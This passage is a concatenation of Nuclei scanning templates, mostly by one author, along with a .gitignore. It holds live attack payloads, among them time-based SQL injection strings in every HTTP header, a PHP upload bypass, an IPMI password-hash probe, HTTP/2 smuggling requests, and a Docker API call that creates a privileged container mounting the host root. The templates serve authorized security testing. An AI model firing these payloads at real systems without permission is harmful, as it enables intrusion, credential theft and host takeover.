{{Hostname}} 16 | Content-Length: 264 17 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ 18 | Accept-Encoding: gzip, deflate 19 | Connection: close 20 | 21 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ 22 | Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" 23 | 24 | {{randstr_1}} 25 | 26 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ 27 | Content-Disposition: form-data; name="name" 28 | 29 | {{randstr}}.php\x0A 30 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- 31 | 32 | - | 33 | GET /{{randstr}}.php\x0A HTTP/1.1 34 | Host: {{Hostname}} 35 | Accept-Encoding: gzip,deflate 36 | Accept: */* 37 | Accept-Language: en 38 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 39 | Connection: close 40 | 41 | req-condition: true 42 | matchers: 43 | - type: dsl 44 | dsl: 45 | - 'contains(body_2, "{{randstr_1}}")' -------------------------------------------------------------------------------- /keys-js.yaml: -------------------------------------------------------------------------------- 1 | id: keys-js 2 | 3 | info: 4 | name: keys.js 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/keys.js" 12 | - "{{BaseURL}}/api/keys.js" 13 | - "{{BaseURL}}/config/keys.js" 14 | - "{{BaseURL}}/web/keys.js" 15 | - "{{BaseURL}}/src/keys.js" 16 | - "{{BaseURL}}/src/api/keys.js" 17 | - "{{BaseURL}}/web/api/keys.js" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "MONGODB_URI:" 27 | - type: word 28 | part: header 29 | words: 30 | - "text/plain" 31 | - "text/javascript" 32 | - "application/javascript" 33 | - "application/x-javascript" 34 | condition: or 35 | - type: word 36 | part: header 37 | words: 38 | - "text/html" 39 | negative: true 40 | - type: word 41 | part: body 42 | words: 43 | - "<html" 44 | - "window.location = x" 45 | - "can not find keys.js" 46 | - "function _popwnd_open" 47 | - "window.dataLayer" 48 | - "console.log(" 49 | - "window.location" 50 | - "Unknown Host" 51 | - "<h1" 52 | - "Error 404: Error not found" 53 | - "SERVICE_NOT_EXIST" 54 | - "<p>" 55 | - "Static content proxy" 56 | - "ABORTED" 57 | - "// Cedexis Inc." 58 | - "This is a placeholder." 59 | - "Counting any requests" 60 | - ": 409," 61 | - "No action executes!" 62 | condition: or 63 | negative: true 64 | - type: dsl 65 | dsl: 66 | - "len(body) > 50 && len(body) < 1024" 67 | -------------------------------------------------------------------------------- /auth-js.yaml: -------------------------------------------------------------------------------- 1 | id: auth-js 2 | 3 | info: 4 | name: auth.js 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/auth.js" 12 | - "{{BaseURL}}/api/auth.js" 13 | - "{{BaseURL}}/config/auth.js" 14 | - "{{BaseURL}}/web/auth.js" 15 | - "{{BaseURL}}/src/auth.js" 16 | - "{{BaseURL}}/src/api/auth.js" 17 | - "{{BaseURL}}/web/api/auth.js" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "state_token =" 27 | - "client_secret" 28 | condition: and 29 | - type: word 30 | part: header 31 | words: 32 | - "text/plain" 33 | - "text/javascript" 34 | - "application/javascript" 35 | - "application/x-javascript" 36 | condition: or 37 | - type: word 38 | part: header 39 | words: 40 | - "text/html" 41 | negative: true 42 | - type: word 43 | part: body 44 | words: 45 | - "<html" 46 | - "window.location = x" 47 | - "can not find auth.js" 48 | - "function _popwnd_open" 49 | - "window.dataLayer" 50 | - "console.log(" 51 | - "window.location" 52 | - "Unknown Host" 53 | - "<h1" 54 | - "Error 404: Error not found" 55 | - "SERVICE_NOT_EXIST" 56 | - "<p>" 57 | - "Static content proxy" 58 | - "ABORTED" 59 | - "// Cedexis Inc." 60 | - "This is a placeholder." 61 | - "Counting any requests" 62 | - ": 409," 63 | - "No action executes!" 64 | condition: or 65 | negative: true 66 | - type: dsl 67 | dsl: 68 | - "len(body) > 50 && len(body) < 8192" 69 | -------------------------------------------------------------------------------- /header-blind-sql-injection.yaml: -------------------------------------------------------------------------------- 1 | id: header-blind-sql-injection 2 | info: 3 | name: Header Blind SQL Injection 4 | author: geeknik 5 | severity: high 6 | tags: blind-sqli 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | headers: 13 | Accept: "' or sleep(30)='" 14 | Accept-Charset: "' or sleep(30)='" 15 | Accept-Datetime: "' or sleep(30)='" 16 | Accept-Encoding: "' or sleep(30)='" 17 | Accept-Language: "' or sleep(30)='" 18 | Authorization: "' or sleep(30)='" 19 | Cache-Control: "' or sleep(30)='" 20 | Connection: "' or sleep(30)='" 21 | Content-Length: "' or sleep(30)='" 22 | Content-MD5: "' or sleep(30)='" 23 | Content-Type: "' or sleep(30)='" 24 | Cookie: "' or sleep(30)='" 25 | Date: "' or sleep(30)='" 26 | Expect: "' or sleep(30)='" 27 | Forwarded: "' or sleep(30)='" 28 | From: "' or sleep(30)='" 29 | If-Match: "' or sleep(30)='" 30 | If-Modified-Since: "' or sleep(30)='" 31 | If-None-Match: "' or sleep(30)='" 32 | If-Range: "' or sleep(30)='" 33 | If-Unmodified-Since: "' or sleep(30)='" 34 | Max-Forwards: "' or sleep(30)='" 35 | Origin: "' or sleep(30)='" 36 | Pragma: "' or sleep(30)='" 37 | Proxy-Authorization: "' or sleep(30)='" 38 | Range: "' or sleep(30)='" 39 | Referer: "' or sleep(30)='" 40 | TE: "' or sleep(30)='" 41 | Upgrade: "' or sleep(30)='" 42 | User-Agent: "' or sleep(30)='" 43 | Via: "' or sleep(30)='" 44 | Warning: "' or sleep(30)='" 45 | X-Client-IP: "' or sleep(30)='" 46 | X-Remote-IP: "' or sleep(30)='" 47 | X-Remote-Addr: "' or sleep(30)='" 48 | X-Forwarded-For: "' or sleep(30)='" 49 | X-Originating-IP: "' or sleep(30)='" 50 | X-Host: "' or sleep(30)='" 51 | X-Forwarded-Host: "' or sleep(30)='" 52 | 53 | matchers: 54 | - type: dsl 55 | dsl: 56 | - 'duration>=29' 57 | -------------------------------------------------------------------------------- /config-js.yaml: -------------------------------------------------------------------------------- 1 | id: config-js 2 | 3 | info: 4 | name: config.js 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/config.js" 12 | - "{{BaseURL}}/api/config.js" 13 | - "{{BaseURL}}/app/config.js" 14 | - "{{BaseURL}}/config/config.js" 15 | - "{{BaseURL}}/web/config.js" 16 | - "{{BaseURL}}/src/config.js" 17 | - "{{BaseURL}}/src/api/config.js" 18 | - "{{BaseURL}}/web/api/config.js" 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: status 23 | status: 24 | - 200 25 | - type: word 26 | words: 27 | - "accessKey: " 28 | - "secreKey: " 29 | - "apiKey: " 30 | - '"client_secret": ' 31 | - "mongodb+srv://" 32 | condition: or 33 | - type: word 34 | part: header 35 | words: 36 | - "text/plain" 37 | - "text/javascript" 38 | - "application/javascript" 39 | - "application/x-javascript" 40 | condition: or 41 | - type: word 42 | part: header 43 | words: 44 | - "text/html" 45 | negative: true 46 | - type: word 47 | part: body 48 | words: 49 | - "<html" 50 | - "window.location = x" 51 | - "can not find config.js" 52 | - "function _popwnd_open" 53 | - "window.dataLayer" 54 | - "console.log(" 55 | - "window.location" 56 | - "Unknown Host" 57 | - "<h1" 58 | - "Error 404: Error not found" 59 | - "SERVICE_NOT_EXIST" 60 | - "<p>" 61 | - "Static content proxy" 62 | - "ABORTED" 63 | - "// Cedexis Inc." 64 | - "This is a placeholder." 65 | - "Counting any requests" 66 | - ": 409," 67 | - "No action executes!" 68 | condition: or 69 | negative: true 70 | - type: dsl 71 | dsl: 72 | - "len(body) > 50 && len(body) < 16384" 73 | -------------------------------------------------------------------------------- /CVE-2013-4786.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2013-4786 2 | 3 | info: 4 | name: IPMI 2.0 RAKP Authentication Remote Password Hash Disclosure 5 | author: geeknik 6 | severity: high 7 | description: The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by extracting HMAC from a BMC response during authentication. 8 | reference: 9 | - https://nvd.nist.gov/vuln/detail/CVE-2013-4786 10 | - http://fish2.com/ipmi/remote-pw-cracking.html 11 | - https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/ 12 | classification: 13 | cve-id: CVE-2013-4786 14 | cwe-id: CWE-255 15 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 16 | cvss-score: 7.5 17 | tags: cve,cve2013,ipmi,rakp,authentication-bypass,network 18 | 19 | network: 20 | - inputs: 21 | - data: 0600ff07000000000000000000092018c88100388e04b5 22 | type: hex 23 | description: IPMI RMCP+ Open Session Request 24 | - data: 0600ff0700000000000000000009201cc88100388e04b5 25 | type: hex 26 | description: IPMI RAKP1 Authentication Request 27 | 28 | host: 29 | - "{{Hostname}}:623" 30 | 31 | read-timeout: 10s 32 | matchers-condition: or 33 | matchers: 34 | - type: binary 35 | binary: 36 | - "0600ff07" 37 | name: ipmi_rmcp_response 38 | condition: and 39 | 40 | - type: regex 41 | regex: 42 | - "\\x06\\x00\\xff\\x07.*\\x00\\x00\\x00\\x08" 43 | name: ipmi_session_response 44 | condition: and 45 | 46 | - type: binary 47 | binary: 48 | - "060000" 49 | - "ff07" 50 | name: ipmi_rakp_response 51 | condition: and 52 | 53 | extractors: 54 | - type: regex 55 | name: ipmi_session_id 56 | regex: 57 | - "([a-fA-F0-9]{8})(?=.*RAKP)" 58 | - "Session.*?([a-fA-F0-9]{8})" 59 | part: body 60 | 61 | - type: binary 62 | name: potential_hash_data 63 | binary: 64 | - "([a-fA-F0-9]{40})" 65 | part: body -------------------------------------------------------------------------------- /oauth-state-bypass.yaml: -------------------------------------------------------------------------------- 1 | id: oauth-state-bypass 2 | info: 3 | name: OAuth State Parameter Bypass Detection 4 | author: geeknik 5 | severity: high 6 | description: | 7 | Detects OAuth implementations vulnerable to CSRF attacks through missing, 8 | predictable, or reusable state parameters in OAuth authorization flows. 9 | reference: 10 | - https://portswigger.net/web-security/oauth 11 | - https://datatracker.ietf.org/doc/html/rfc6749#section-10.12 12 | classification: 13 | cwe-id: CWE-352 14 | tags: oauth,csrf,authentication,bypass 15 | metadata: 16 | max-request: 5 17 | 18 | variables: 19 | redirect_uri: "https://example.com/callback" 20 | client_id: "test_client_{{randstr}}" 21 | 22 | requests: 23 | - method: GET 24 | path: 25 | - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}" 26 | - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}&state=" 27 | - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}&state=predictable123" 28 | - "{{BaseURL}}/auth/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}" 29 | - "{{BaseURL}}/oauth2/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}" 30 | 31 | redirects: true 32 | max-redirects: 3 33 | 34 | matchers-condition: or 35 | matchers: 36 | - type: dsl 37 | dsl: 38 | - "!contains(toLower(location), 'state=')" 39 | - "status_code == 302" 40 | condition: and 41 | 42 | - type: regex 43 | part: header 44 | regex: 45 | - 'Location:.*[?&]code=' 46 | condition: and 47 | 48 | - type: word 49 | part: header 50 | words: 51 | - "state=predictable123" 52 | - "state=" 53 | condition: or 54 | 55 | extractors: 56 | - type: regex 57 | part: header 58 | name: oauth_flow 59 | regex: 60 | - 'Location:\s*([^s]+)' 61 | 62 | - type: regex 63 | part: header 64 | regex: 65 | - '[?&]state=([^&]+)' 66 | - '[?&]code=([^&]+)' -------------------------------------------------------------------------------- /kubernetes-api-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-api-exposure 2 | info: 3 | name: Kubernetes API Server Exposure Detection 4 | author: geeknik 5 | severity: critical 6 | description: | 7 | Detects exposed Kubernetes API servers that may allow unauthorized access 8 | to cluster resources, secrets, and potential container escape paths. 9 | reference: 10 | - https://kubernetes.io/docs/reference/access-authn-authz/ 11 | - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ 12 | classification: 13 | cwe-id: CWE-284 14 | tags: kubernetes,k8s,cloud,api,exposure,critical 15 | metadata: 16 | max-request: 8 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/api" 22 | - "{{BaseURL}}/api/v1" 23 | - "{{BaseURL}}/apis" 24 | - "{{BaseURL}}/api/v1/namespaces" 25 | - "{{BaseURL}}/api/v1/namespaces/default/pods" 26 | - "{{BaseURL}}/api/v1/namespaces/default/secrets" 27 | - "{{BaseURL}}/api/v1/nodes" 28 | - "{{BaseURL}}/version" 29 | 30 | headers: 31 | User-Agent: kubectl/v1.25.0 32 | 33 | stop-at-first-match: true 34 | 35 | matchers-condition: and 36 | matchers: 37 | - type: word 38 | part: body 39 | words: 40 | - '"kind":' 41 | - '"apiVersion":' 42 | - '"kubernetes"' 43 | condition: and 44 | 45 | - type: word 46 | part: body 47 | words: 48 | - '"major":' 49 | - '"minor":' 50 | - '"gitVersion":' 51 | - '"resourceVersion":' 52 | - '"selfLink":' 53 | - '"items":' 54 | - '"metadata":' 55 | condition: or 56 | 57 | - type: status 58 | status: 59 | - 200 60 | - 403 61 | 62 | - type: word 63 | part: header 64 | words: 65 | - "application/json" 66 | 67 | extractors: 68 | - type: regex 69 | part: body 70 | regex: 71 | - '"gitVersion":\s*"v([0-9]+\.[0-9]+\.[0-9]+)"' 72 | - '"name":\s*"([^"]+)"' 73 | - '"namespace":\s*"([^"]+)"' 74 | 75 | - type: json 76 | json: 77 | - '.items[].metadata.name' 78 | - '.items[].spec.nodeName' 79 | - '.items[].spec.serviceAccountName' -------------------------------------------------------------------------------- /dom-xss.yaml: -------------------------------------------------------------------------------- 1 | id: dom-xss 2 | 3 | info: 4 | name: DOM XSS Sources & Sinks 5 | reference: https://portswigger.net/blog/introducing-dom-invader 6 | author: geeknik 7 | severity: info 8 | tags: dom,xss 9 | 10 | file: 11 | - extensions: 12 | - js 13 | - ts 14 | - html 15 | - php 16 | - cs 17 | - rb 18 | - py 19 | 20 | extractors: 21 | - type: regex 22 | name: sink 23 | part: body 24 | regex: 25 | - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' 26 | - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' 27 | - 'fetch(\.body)?' 28 | - 'history(\.pushState|\.replaceState)' 29 | - '(session|local)Storage(\.setItem(\.name|\.value))' 30 | - 'anchor(\.href|\.target)' 31 | - 'button(\.formaction|\.value)' 32 | - 'set(Timeout|Interval|Immediate)' 33 | - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' 34 | - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' 35 | - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' 36 | - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' 37 | - 'iframe(\.srcdoc|\.src)' 38 | - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' 39 | - type: regex 40 | name: source 41 | part: body 42 | regex: 43 | - 'location(\.href|\.hash|\.search|\.pathname)?' 44 | - 'window\.name' 45 | - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' 46 | -------------------------------------------------------------------------------- /http2-request-smuggling.yaml: -------------------------------------------------------------------------------- 1 | id: http2-request-smuggling 2 | info: 3 | name: HTTP/2 Request Smuggling Detection 4 | author: geeknik 5 | severity: high 6 | description: | 7 | Detects HTTP/2 request smuggling vulnerabilities through various techniques including 8 | header injection, stream manipulation, and protocol downgrade attacks. 9 | reference: 10 | - https://portswigger.net/research/http2 11 | - https://www.blackhat.com/us-21/briefings/schedule/#http2-the-sequel-is-always-worse-22668 12 | classification: 13 | cwe-id: CWE-444 14 | tags: http2,smuggling,desync,critical 15 | metadata: 16 | max-request: 5 17 | 18 | http: 19 | - raw: 20 | - | 21 | PRI * HTTP/2.0 22 | 23 | SM 24 | 25 | - | 26 | GET /test HTTP/2 27 | Host: {{Hostname}} 28 | Transfer-Encoding: chunked 29 | Content-Length: 0 30 | 31 | - | 32 | GET /admin HTTP/2 33 | Host: {{Hostname}} 34 | X-HTTP2-Settings: AAMAAABkAAQAoAAAAAIAAAAA 35 | X-HTTP2-Stream-ID: 1 36 | X-HTTP2-Stream-Weight: 256 37 | 38 | - | 39 | POST /search HTTP/2 40 | Host: {{Hostname}} 41 | Content-Type: application/x-www-form-urlencoded 42 | Content-Length: 13 43 | Transfer-Encoding: chunked 44 | 45 | 0 46 | 47 | GET /admin HTTP/1.1 48 | Host: {{Hostname}} 49 | 50 | - | 51 | GET / HTTP/2 52 | Host: {{Hostname}} 53 | :method: GET 54 | :path: /admin 55 | :scheme: https 56 | :authority: {{Hostname}} 57 | 58 | unsafe: true 59 | matchers-condition: or 60 | matchers: 61 | - type: word 62 | part: body 63 | words: 64 | - "HTTP/2" 65 | - "stream error" 66 | - "protocol error" 67 | - "SETTINGS_ENABLE_PUSH" 68 | condition: or 69 | 70 | - type: regex 71 | part: header 72 | regex: 73 | - 'X-HTTP2-Stream-\w+:' 74 | - 'X-Forwarded-Proto:\s*h2' 75 | 76 | - type: dsl 77 | dsl: 78 | - "contains(tolower(all_headers), 'http/2')" 79 | - "status_code == 400 || status_code == 421 || status_code == 505" 80 | condition: and 81 | 82 | extractors: 83 | - type: regex 84 | part: header 85 | regex: 86 | - 'X-HTTP2-Stream-ID:\s*(\d+)' 87 | - 'X-HTTP2-Stream-Weight:\s*(\d+)' -------------------------------------------------------------------------------- /CVE-2020-36112.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-36112 2 | 3 | info: 4 | name: CSE Bookstore 1.0 SQL Injection 5 | author: geeknik 6 | description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. 7 | reference: https://www.exploit-db.com/exploits/49314 8 | severity: high 9 | tags: cve,cve2020,sqli,cse 10 | 11 | requests: 12 | - raw: 13 | - | 14 | GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 15 | Host: {{Hostname}} 16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 18 | Accept-Language: en-US,en;q=0.5 19 | Accept-Encoding: gzip, deflate 20 | DNT: 1 21 | Connection: close 22 | Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n 23 | Upgrade-Insecure-Requests: 1 24 | 25 | - | 26 | POST /ebook/cart.php HTTP/1.1 27 | Host: {{Hostname}} 28 | Accept-Encoding: gzip, deflate 29 | Accept: */* 30 | Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 32 | Connection: close 33 | Cache-Control: max-age=0 34 | Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4 35 | Content-Type: application/x-www-form-urlencoded 36 | Content-Length: 57 37 | Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 38 | 39 | bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart 40 | 41 | - | 42 | GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 43 | Host: {{Hostname}} 44 | Accept-Encoding: gzip, deflate 45 | Accept: */* 46 | Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 47 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 48 | Connection: close 49 | Cache-Control: max-age=0 50 | Referer: http://{{Hostname}}/ebook/books.php 51 | Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on 52 | 53 | matchers: 54 | - type: word 55 | part: body 56 | words: 57 | - "get book price failed! You have an error in your SQL syntax" 58 | - "Can't retrieve data You have an error in your SQL syntax" 59 | condition: or 60 | -------------------------------------------------------------------------------- /container-escape-detection.yaml: -------------------------------------------------------------------------------- 1 | id: container-escape-detection 2 | info: 3 | name: Container Escape Vulnerability Detection 4 | author: geeknik 5 | severity: critical 6 | description: | 7 | Detects indicators of container escape vulnerabilities including exposed 8 | Docker sockets, privileged containers, and host filesystem access. 9 | reference: 10 | - https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ 11 | - https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout 12 | classification: 13 | cwe-id: CWE-269 14 | tags: docker,container,escape,privilege-escalation,critical 15 | metadata: 16 | max-request: 10 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/var/run/docker.sock" 22 | - "{{BaseURL}}/.dockerenv" 23 | - "{{BaseURL}}/secrets/kubernetes.io/serviceaccount/token" 24 | - "{{BaseURL}}/run/secrets/kubernetes.io/serviceaccount/token" 25 | - "{{BaseURL}}/var/run/secrets/kubernetes.io/serviceaccount/token" 26 | - "{{BaseURL}}/proc/self/cgroup" 27 | - "{{BaseURL}}/proc/1/cgroup" 28 | 29 | matchers-condition: or 30 | matchers: 31 | - type: word 32 | part: body 33 | words: 34 | - "docker" 35 | - "kubepods" 36 | - "containerd" 37 | 38 | - type: regex 39 | part: body 40 | regex: 41 | - '/docker/[a-f0-9]{64}' 42 | - '/kubepods/[a-f0-9-]+' 43 | 44 | - method: GET 45 | path: 46 | - "{{BaseURL}}/v1.24/containers/json" 47 | - "{{BaseURL}}/v1.40/containers/json" 48 | - "{{BaseURL}}/v1.41/containers/json" 49 | 50 | headers: 51 | Host: docker 52 | 53 | matchers: 54 | - type: word 55 | part: body 56 | words: 57 | - '"Id":' 58 | - '"Image":' 59 | - '"Command":' 60 | condition: and 61 | 62 | - method: POST 63 | path: 64 | - "{{BaseURL}}/containers/create" 65 | 66 | headers: 67 | Content-Type: application/json 68 | Host: docker 69 | 70 | body: | 71 | { 72 | "Image": "alpine", 73 | "Cmd": ["sh", "-c", "echo container_escape_test"], 74 | "HostConfig": { 75 | "Privileged": true, 76 | "Binds": ["/:/host"] 77 | } 78 | } 79 | 80 | matchers-condition: and 81 | matchers: 82 | - type: status 83 | status: 84 | - 201 85 | - 200 86 | 87 | - type: word 88 | part: body 89 | words: 90 | - '"Id":' 91 | 92 | extractors: 93 | - type: json 94 | json: 95 | - '.Id' 96 | - '.Warnings' -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Claude AI Assistant files 2 | .claude 3 | CLAUDE.md 4 | Claude.md 5 | CLAUDE_* 6 | claude_* 7 | .claude_* 8 | 9 | # Warp terminal files 10 | .warp/ 11 | *.warp 12 | 13 | # OS generated files 14 | .DS_Store 15 | .DS_Store? 16 | ._* 17 | .Spotlight-V100 18 | .Trashes 19 | ehthumbs.db 20 | Thumbs.db 21 | 22 | # Editor and IDE files 23 | .vscode/ 24 | .idea/ 25 | *.swp 26 | *.swo 27 | *~ 28 | .vim/ 29 | *.sublime-* 30 | 31 | # Temporary files 32 | *.tmp 33 | *.temp 34 | *.bak 35 | *.backup 36 | *.orig 37 | *.rej 38 | *.patch 39 | resume.cfg 40 | 41 | # Logs 42 | *.log 43 | logs/ 44 | npm-debug.log* 45 | yarn-debug.log* 46 | yarn-error.log* 47 | 48 | # Environment and configuration files 49 | .env 50 | .env.local 51 | .env.development.local 52 | .env.test.local 53 | .env.production.local 54 | config.local.* 55 | .nuclei-ignore 56 | 57 | # Build and output directories 58 | dist/ 59 | build/ 60 | out/ 61 | target/ 62 | 63 | # Dependency directories 64 | node_modules/ 65 | vendor/ 66 | .pnpm-store/ 67 | 68 | # Package manager files 69 | package-lock.json 70 | yarn.lock 71 | pnpm-lock.yaml 72 | 73 | # Go specific 74 | # Binaries for programs and plugins 75 | *.exe 76 | *.exe~ 77 | *.dll 78 | *.so 79 | *.dylib 80 | 81 | # Test binary, built with `go test -c` 82 | *.test 83 | 84 | # Output of the go coverage tool, specifically when used with LiteIDE 85 | *.out 86 | 87 | # Go workspace file 88 | go.work 89 | go.work.sum 90 | 91 | # Python specific 92 | __pycache__/ 93 | *.py[cod] 94 | *$py.class 95 | *.so 96 | .Python 97 | build/ 98 | develop-eggs/ 99 | dist/ 100 | downloads/ 101 | eggs/ 102 | .eggs/ 103 | lib/ 104 | lib64/ 105 | parts/ 106 | sdist/ 107 | var/ 108 | wheels/ 109 | *.egg-info/ 110 | .installed.cfg 111 | *.egg 112 | PIPFILE.lock 113 | 114 | # Security and sensitive files 115 | *.key 116 | *.pem 117 | *.cert 118 | *.crt 119 | *.p12 120 | *.pfx 121 | secrets.yaml 122 | secrets.yml 123 | *.secret 124 | 125 | # Test and coverage reports 126 | coverage/ 127 | .coverage 128 | .pytest_cache/ 129 | .tox/ 130 | .nox/ 131 | htmlcov/ 132 | 133 | # Documentation build 134 | docs/_build/ 135 | site/ 136 | 137 | # Cache directories 138 | .cache/ 139 | .parcel-cache/ 140 | .npm/ 141 | .yarn/ 142 | 143 | # Personal notes and TODO files 144 | TODO.md 145 | NOTES.md 146 | SCRATCH.md 147 | *.notes 148 | 149 | # Nuclei specific 150 | # Exclude potential sensitive test results 151 | test-results/ 152 | reports/ 153 | *.json.bak 154 | *.yaml.bak 155 | *.yml.bak 156 | 157 | # Backup files from editors 158 | *~ 159 | .#* 160 | #*# 161 | 162 | # Non-template trash 163 | *.sh 164 | *.py 165 | *.db 166 | *.json 167 | venv/ 168 | -------------------------------------------------------------------------------- /websocket-upgrade-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-upgrade-oob 2 | 3 | info: 4 | name: WebSocket Upgrade Header Injection OOB Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects WebSocket endpoints that improperly handle Upgrade headers with external URLs, 9 | potentially leading to SSRF through WebSocket-Sec-WebSocket-Protocol or custom headers 10 | that trigger external connections during the WebSocket handshake process. 11 | reference: 12 | - https://tools.ietf.org/html/rfc6455 13 | - https://portswigger.net/web-security/websockets 14 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N 17 | cvss-score: 6.1 18 | cwe-id: CWE-918 19 | tags: websocket,oob,ssrf,upgrade,handshake 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | - "/chat" 32 | - "/live" 33 | - "/stream" 34 | 35 | headers: 36 | Sec-WebSocket-Protocol: "{{callback_url}}" 37 | Sec-WebSocket-Extensions: "permessage-deflate; server_max_window_bits" 38 | Origin: "{{callback_url}}" 39 | 40 | inputs: 41 | - data: | 42 | { 43 | "type": "upgrade_test", 44 | "protocol": "{{callback_url}}", 45 | "callback_url": "{{callback_url}}/websocket-upgrade" 46 | } 47 | - data: | 48 | { 49 | "command": "connect", 50 | "external_protocol": "{{callback_url}}", 51 | "origin": "{{callback_url}}" 52 | } 53 | - data: | 54 | { 55 | "action": "handshake_callback", 56 | "webhook_url": "{{callback_url}}/callback", 57 | "external_origin": "{{callback_url}}" 58 | } 59 | 60 | - address: "{{BaseURL}}" 61 | path: 62 | - "/ws" 63 | - "/websocket" 64 | - "/socket.io/" 65 | - "/api/ws" 66 | 67 | headers: 68 | X-Forwarded-Proto: "{{callback_url}}" 69 | X-WebSocket-Callback: "{{callback_url}}/callback" 70 | X-External-Origin: "{{callback_url}}" 71 | 72 | inputs: 73 | - data: | 74 | { 75 | "type": "protocol_injection", 76 | "forward_to": "{{callback_url}}", 77 | "proxy_target": "{{callback_url}}/proxy" 78 | } 79 | 80 | matchers: 81 | - type: word 82 | part: interactsh_protocol 83 | words: 84 | - "http" 85 | - "dns" 86 | condition: or -------------------------------------------------------------------------------- /tls-pqc-downgrade-attack.yaml: 